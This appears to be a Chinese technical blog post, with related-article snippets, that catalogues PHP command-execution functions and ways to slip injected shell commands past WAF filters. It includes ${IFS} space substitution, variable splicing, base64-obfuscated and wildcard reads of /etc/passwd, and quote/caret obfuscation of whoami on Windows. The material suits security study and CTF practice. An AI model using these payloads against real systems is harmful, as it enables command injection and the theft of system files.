WAF绕过之命令执行

最新推荐文章于 2026-03-20 00:11:32 发布
原创 最新推荐文章于 2026-03-20 00:11:32 发布 · 731 阅读 · 0 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#linux #安全 #web安全 #网络安全 #网络攻击模型
文章介绍了PHP中常见的命令执行函数,如system(),exec(),shell_exec()等,并讨论了如何在遇到限制时通过各种方法绕过空格、编码、特殊字符等方式执行命令,包括在Linux和Windows环境下的策略。

开发板推荐:天空星STM32F407VET6开发板

超高性价比 STM32主控 | 超高主频 | 一板兼容百芯 | 比赛神器 | 沉金彩色丝印

点击查看

常见的命令执行函数:

system() #输出并返回最后一行shell结果。 exec() #不输出结果,返回最后一行shell结果,所有结果保存到一个返回数组里。 passthru() #只调用命令,把命令的运行结果原样地直接输出到标准输出设备上。 popen()、proc_open() #不会直接返回执行结果,而是返回一个文件指针 shell_exec() #通过shell执行命令并以字符串的形式返回完整的输出 反引号 #本质是使用shell_exec()函数

命令分隔符:

windows: && || & | linux: && || & | ; 分号;在shell中担任连续指令的功能

php环境中可以使用: %0a 换行符 %0d 回车符

截断符号:

$ ; | & - ( ) { } 反引号 || && %0a #有时可当空格使用

命令执行绕过

1、绕过空格 ${IFS} $IFS$9 #$9可改成$加其他数字 < <> #重定向符 {cat,flag.php} #用逗号,实现了空格功能 %20 %09

2、拼接

#在linux系统中 a=g;cat fla$a.php a=fl;b=ag.php;cat $a$b #在php的ping环境中 ip=;a=g;cat fla$a.php ip=;a=fl;b=ag.php;cat $a$b

3、编码

cat /etc/$(echo "cGFzc3dk"|base64 -d)

4、单引号、双引号绕过

cat te''st.txt cat te""st.txt c''at te''st.txt c""at te""st.txt

5、反斜杠绕过

cat te\st.txt c\at te\st.txt

6、通配符绕过

cat /etc/pass*

windows下同理:如当命令执行被拦截的时候需要进行绕过,如whoami被拦截可以尝试如下进行绕过 w"h"o"a"m"i "w"h"o"a"m"i" "w"h"o"a"m"i w"h"o"a"m"i" who^ami wh""o^a^mi wh""o^a^mi ((((Wh^o^am""i)))) (Wh^o^am""i) (Whoami)

或者 set a=who set b=ami %a%%b% //正常执行whoami call

%a%%b% //正常执行whoami

开发板推荐:天空星STM32F407VET6开发板

超高性价比 STM32主控 | 超高主频 | 一板兼容百芯 | 比赛神器 | 沉金彩色丝印

点击查看
绕过WAF运行命令执行漏洞的方法大全
hackzkaq的博客
10-09 2516
文章目录**前言****一、windows下**二、进入linux三、一个有趣的例子总结 前言 作者:掌控安全-桐镜 今天发散一下思维,聊聊关于命令执行漏洞绕过过滤的方法,让我们一起由浅入深。 一、windows下 1.1 符号与命令的关系 在看一个例子开始之前,首先了解一点,”和^这还有成对的圆括号()符号并不会影响命令的执行。在windows环境下,命令可以不区分大小写 whoami //正常执行 w"h"o"a"m"i //正常执行 w"h"o"a"m"i" //正常执行 wh"“oami //正常执
【CTF】php里面的命令注入技巧
网络空间安全|人工智能|计算机科学
10-18 1569
CTF比赛和代码审计中经常使用的命令注入技巧
PHP反序列化漏洞利用:从ezbypass-cat看${IFS}的妙用
最新发布
weixin_29290947的博客
03-20 204
本文深入解析了PHP反序列化漏洞利用中的${IFS}技巧,以CTF题目'ezbypass-cat'为例,详细介绍了如何绕过WAF的空格过滤和关键词检测。通过${IFS}替代空格并结合八进制编码,实现了有效的命令注入攻击,为安全研究和防御提供了实用参考。
web安全命令执行(六)
Delity的博客
07-08 4166
一、命令执行漏洞介绍 命令执行(Command Execution)漏洞即黑客可以直接在Web应用中执行系统命令,从而获取敏感信息或者拿下shell权限,可能造成的原因是Web服务器对用户输入命令安全检测不足,导致恶意代码被执行,更常见的命令执行漏洞是发生在各种Web组件,包括Web容器、Web框架、CMS软件、安全组件等 二、PHP与命令执行漏洞相关的函数: 1、PHP的5种命令执行函数:system()、exec()、passthru()、shell_exec()、“运算符 eval()函数注入攻击,将
漏洞扫描、命令执行绕过WAF
2401_83237906的博客
10-28 1228
一被封就换IP;但这玩意要付费;
linux命令 waf,命令执行WAF绕过技巧总结
weixin_42326661的博客
05-09 400
原标题:命令执行WAF绕过技巧总结*本文作者:zusheng,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。前言如今市面上的WAF几乎都已经具备了针对RCE攻击的防御能力,这些WAF并不是想象中毫无破绽,当Web服务器是Linux平台时我们就可以利用一些技巧来绕过WAF规则集。本文主要总结Linux平台下针对RCE WAF绕过技巧,Windows平台不在本文考虑范围内。0×01 技巧一...
Kali中文社区:java命令执行+waf绕过研究
superadminuser的博客
08-05 1403
Kali中文社区:java命令执行+waf绕过研究原因简单说waf绕过常用命令执行函数最后总结一下 原因 今天在项目中,碰到了waf,本着学习研究的原则,刚好最近在学习java,就顺便研究java命令执行的东西。 简单说waf绕过 网上绕过的方法花里胡哨,这里就简单的说一下本人常用的绕过方法。 参数污染,主要是双写参数,或者对参数进行简单的变形,去除双引号等,主要是为了让waf无需检测这一类参数,或者根据操作系统特性,服务器特性进行绕过,这里感觉越来越难绕了就不多少。 垃圾数据填充,这一招能过的还是
RCE命令执行攻击绕过WAF步骤
qq_48368964的博客
08-18 1154
WAF对用户输入的检测是存在一定限制的,这个限制来源于WAF的资源,如果WAF占用太多的资源,就会影响业务系统正常运行,因此WAF再很多时候都会放松对cookie等方式的检验。对于不同的WAF而言,对RCE攻击拦截的原理是不同的,有的是检测用户输入的内容,有的是检测用户访问页面的内容。eval函数可以将输入当作命令来执行,但是我们的输入是一个base64_decode()函数,因此eval函数会执行base64_decode()函数,该函数执行的结果是phpinfo(),但是该函数执行后的结果并没有执行。
Web1 命令执行(二)
weixin_53896576的博客
01-24 6863
三.常见的系统执行函数 system,shell_exec,exec,popen,passthru 1.system 将 字符串 作为 OS命令 去执⾏,并且 自带输出功能。 system(string $command, int &$return_var = ?): string 利用方式: <?php //a = system('ls') $a = $_REQUEST[a]; eval($a); ?> 2.shell_exec() 通过 shell 环境执⾏命.
Linux内部字段分离符环境变量IFS
khx0910的博客
05-22 846
Linux内部字段分离符环境变量IFS:用于bash shell,默认bash shell 会将空格、制表符/t、换行符/n 当成字段分隔符 arr=(/pubsentiment?action=chezhi&site=bbs.12365auto.com&method=inner&id=1&date=&version=1590050449:3h:1:1;/pubsentiment?action=pcauto&site=bbs.pcauto.com.cn&am
$IFS
vsooda的专栏
06-23 1175
转自:http://bash.cyberciti.biz/guide/$IFS The IFS is a special shell variable.You can change the value of IFS as per your requirments.The Internal Field Separator (IFS) that is used for word splittin
PHP命令执行漏洞基础
笑花大王
02-02 2336
前言 PHP命令执行漏洞 应用程序的某些功能功能需要调用可以执行系统命令的函数,如果这些函数或者函数的参数被用户控制,就有可能通过命令连接符将恶意命令拼接到正常的函数中,从而随意执行系统命令,这就是命令执行漏洞。 基本函数 1.system()用于执行外部程序,并且显示输出 <?php system('whoami'); ?> 2.exec()函数用于执行一个...
linux shell bash -c $IFS ${IFS}
qq_29060627的博客
04-30 1129
root@out:~# aa='echo${IFS}-e${IFS}-n${IFS}"123\\\n456"' root@out:~# bash -c $aa; 123\n456root@out:~# root@out:~# 如上所示:为什么需要${IFS}? 其实可以不用$IFS,只用把$aa用 双引号 引起来. root@out:~# cc='sleep "1";echo -e "123\n456"'; root@out:~# echo $cc sleep "1";ech...
linux shell之IFS(定界符)
CodeHouse的博客
10-24 2836
IFS是环境变量,默认值是空格 echo ${IFS} 修改IFS的默认值#!/bin/bash #定界符的使用IFS环境变量 echo ${IFS} oldIFS=${IFS} IFS=, VAR="name,sex,number,grade" for i in ${VAR} do echo item:${i} done IFS=${oldIFS} root@ubuntu:~# ./d
麒麟 Linux|写脚本总出Bug?可能是你忽略了Shell里最“阴险”的变量IFS
安呀智数据坊的博客
10-31 471
在 Shell 脚本的世界里,有许多变量和机制在幕后默默工作,深刻地影响着命令的解析和执行。
命令注入总结
weixin_44576725的博客
12-15 7870
文章目录命令注入总结原理常见的危险函数PHPsystemexecpassthrushell_execpopenproc_open反引号Pythonsystempopensubprocess.call/subprocess.runspawnJavajava.lang.Runtime.getRuntime().exec(command)Linux下常用的符号特殊符号通配符常用绕过命令分隔与执行多条命令空格绕过绕过 escapeshellcmd黑名单绕过无参数rce过滤字母或数字常用读取文件方式常用读取目录方式利
命令执行漏洞各种绕过方式
m0re's blog
07-10 8529
本文目录前言命令执行漏洞绕过方式管道符windows中常见管道符linux中常见管道符空格过滤黑名单绕过通配符绕过内敛执行绕过编码绕过绕过长度限制`>`和`>>`两个符号的使用命令换行最后参考文章 前言 刚做了一道题,是有关命令执行漏洞的,里面过滤的内容比较多,一时间找不到头绪,所以学习一下关于命令执行漏洞的绕过方式,以便以后遇到不会像现在这样一点思路都没有。 命令执行漏洞绕过方式 管道符 windows中常见管道符 | 直接执行后面的语句 || 如果前面命令是错的那么就执行后面的语句
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值